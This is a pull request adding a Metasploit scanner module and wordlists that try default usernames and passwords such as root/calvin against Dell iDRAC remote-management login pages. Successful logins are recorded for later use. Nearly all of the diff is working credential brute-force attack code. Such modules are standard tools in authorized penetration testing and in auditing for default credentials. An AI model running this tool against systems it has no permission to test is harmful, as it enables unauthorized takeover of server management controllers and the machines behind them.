### PR TITLE
Dell iDrac login aux scanner

### DIFF
--- a/data/wordlists/idrac_default_pass.txt
+++ b/data/wordlists/idrac_default_pass.txt
@@ -1,0 +1,3 @@
+calvin
+123456
+password

--- a/data/wordlists/idrac_default_user.txt
+++ b/data/wordlists/idrac_default_user.txt
@@ -1,0 +1,3 @@
+root
+user1
+admin

--- a/modules/auxiliary/scanner/http/dell_idrac.rb
+++ b/modules/auxiliary/scanner/http/dell_idrac.rb
@@ -1,0 +1,118 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::AuthBrute
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name' => 'Dell iDRAC default Login',
+			'Version' => '$Revision$',
+			'Description' => %q{This module attempts to login to a iDRAC webserver
+				instance using default username and password. Tested against
+				Dell Remote Access Controller 6 - Express version 1.50 and 1.85},
+			'Author' =>
+				[
+					'Cristiano Maruti <cmaruti[at]gmail.com>'
+				],
+			'References' =>
+				[
+					['CVE', '1999-0502'] # Weak password
+				],
+			'License' => MSF_LICENSE
+		)
+
+		register_options([
+			OptString.new('TARGETURI', [true, 'Path to the iDRAC Administration page', '/data/login']),
+			OptInt.new('RPORT', [true, "Default remote port", 443])
+		], self.class)
+
+		register_advanced_options([
+			OptBool.new('SSL', [true, "Negotiate SSL connection", true])
+		], self.class)
+	end
+
+	def target_url
+		proto = "http"
+		if rport == 443 or ssl
+			proto = "https"
+		end
+		"#{proto}://#{vhost}:#{rport}#{datastore['URI']}"
+	end
+	
+	def do_login(user='root', pass='calvin')
+	
+		auth = send_request_cgi({
+			'method' => 'POST',
+			'uri' => target_uri.path,
+			'SSL' => true,
+			'vars_post' => {
+				'user' => user,
+				'password' => pass
+			}
+		}, 20)
+				
+		if(auth and auth.body.to_s.match(/<authResult>[0|5]<\/authResult>/) != nil )
+			print_good("#{target_url} - SUCCESSFUL login for user '#{user}' with password '#{pass}'")
+			report_auth_info(
+				:host => rhost,
+				:port => rport,
+				:proto => 'tcp',
+				:sname => (ssl ? 'https' : 'http'),
+				:user => user,
+				:pass => pass,
+				:active => true,
+				:source_type => "user_supplied",
+				:duplicate_ok => true
+			)
+		else
+			print_error("#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'")
+		end
+	end
+	
+	def run_host(ip)
+
+		print_status("Verifying that login page exists at #{ip}")
+		begin
+			res = send_request_raw({
+				'method' => 'GET',
+				'uri' => target_uri.path
+				}, 20)
+				
+			if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)
+				print_status("Attempting authentication")
+				
+				each_user_pass { |user, pass|
+					do_login(user, pass)
+				}
+				
+			elsif (res and res.code == 301)
+				print_error("#{target_url} - Page redirect to #{res.headers['Location']}")
+				return :abort
+			else
+				print_error("The iDRAC login page does not exist at #{ip}")
+				return :abort
+			end	
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		rescue ::OpenSSL::SSL::SSLError => e
+			return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted
+		end
+	end
+
+end

--- a/modules/auxiliary/scanner/http/dell_idrac.rb
+++ b/modules/auxiliary/scanner/http/dell_idrac.rb
@@ -38,6 +38,10 @@ class Metasploit3 < Msf::Auxiliary
 
 		register_options([
 			OptString.new('TARGETURI', [true, 'Path to the iDRAC Administration page', '/data/login']),
+			OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
+				File.join(Msf::Config.install_root, "data", "wordlists", "idrac_default_users.txt") ]),
+			OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
+				File.join(Msf::Config.install_root, "data", "wordlists", "idrac_default_pass.txt") ]),
 			OptInt.new('RPORT', [true, "Default remote port", 443])
 		], self.class)
 
@@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
 		"#{proto}://#{vhost}:#{rport}#{datastore['URI']}"
 	end
 	
-	def do_login(user='root', pass='calvin')
+	def do_login(user=nil, pass=nil)
 	
 		auth = send_request_cgi({
 			'method' => 'POST',


### PR DESCRIPTION
This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85.
